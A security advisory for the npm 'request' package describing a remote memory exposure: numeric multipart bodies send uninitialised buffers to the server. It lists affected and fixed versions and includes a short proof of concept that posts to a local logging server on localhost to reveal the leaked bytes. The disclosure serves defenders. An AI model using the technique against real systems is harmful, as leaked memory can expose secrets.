An open API service providing security vulnerability metadata for many open source software ecosystems.


Severity: Moderate
EPSS: 0.00815% (0.73565 percentile)

Remote Memory Exposure in request

Affected package: npm:request (PURL: pkg:npm/request)
Affected versions: >= 2.2.6, < 2.47.0 and >= 2.49.0, < 2.68.0
Fixed version: 2.68.0 (for both ranges)
Dependent packages: 58,231
Dependent repositories: 847,768
Downloads last month: 62,108,206

Affected Version Ranges

All affected versions

2.2.6, 2.2.9, 2.9.0, 2.9.1, 2.9.2, 2.9.3, 2.9.100, 2.9.150, 2.9.151, 2.9.152, 2.9.153, 2.9.200, 2.9.201, 2.9.202, 2.9.203, 2.10.0, 2.11.0, 2.11.1, 2.11.2, 2.11.3, 2.11.4, 2.12.0, 2.14.0, 2.16.0, 2.16.2, 2.16.4, 2.16.6, 2.18.0, 2.19.0, 2.20.0, 2.21.0, 2.22.0, 2.23.0, 2.24.0, 2.25.0, 2.26.0, 2.27.0, 2.28.0, 2.29.0, 2.30.0, 2.31.0, 2.32.0, 2.33.0, 2.34.0, 2.35.0, 2.36.0, 2.37.0, 2.38.0, 2.39.0, 2.40.0, 2.41.0, 2.42.0, 2.43.0, 2.44.0, 2.45.0, 2.46.0, 2.49.0, 2.50.0, 2.51.0, 2.52.0, 2.53.0, 2.54.0, 2.55.0, 2.56.0, 2.57.0, 2.58.0, 2.59.0, 2.60.0, 2.61.0, 2.62.0, 2.63.0, 2.64.0, 2.65.0, 2.66.0, 2.67.0

All unaffected versions

0.8.3, 0.9.0, 0.9.1, 0.9.5, 0.10.0, 1.0.0, 1.1.0, 1.1.1, 1.2.0, 1.9.0, 1.9.1, 1.9.2, 1.9.3, 1.9.5, 1.9.7, 1.9.8, 1.9.9, 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.1.0, 2.1.1, 2.2.0, 2.2.5, 2.47.0, 2.48.0, 2.68.0, 2.69.0, 2.70.0, 2.71.0, 2.72.0, 2.73.0, 2.74.0, 2.75.0, 2.76.0, 2.77.0, 2.78.0, 2.79.0, 2.80.0, 2.81.0, 2.82.0, 2.83.0, 2.84.0, 2.85.0, 2.86.0, 2.87.0, 2.88.0, 2.88.2

Affected versions of request disclose local system memory to remote systems in certain circumstances. When a multipart request is made and the body of a part is a number, a buffer of that size is allocated and sent to the remote server as the part's body, so whatever memory that buffer happened to contain is transmitted.

Proof of Concept

var request = require('request');
var http = require('http');

// A local server that logs whatever body bytes it receives, so the
// leaked buffer contents become visible on the receiving side.
var serveFunction = function (req, res) {
  req.on('data', function (data) {
    console.log(data);
  });
  res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);

// A numeric part body (500) is turned into a 500-byte buffer by affected
// versions and sent as-is to the server above.
request({
  method: "POST",
  uri: 'http://localhost:8000',
  multipart: [{ body: 500 }]
}, function (err, res, body) {});

Recommendation

Update to version 2.68.0 or later.
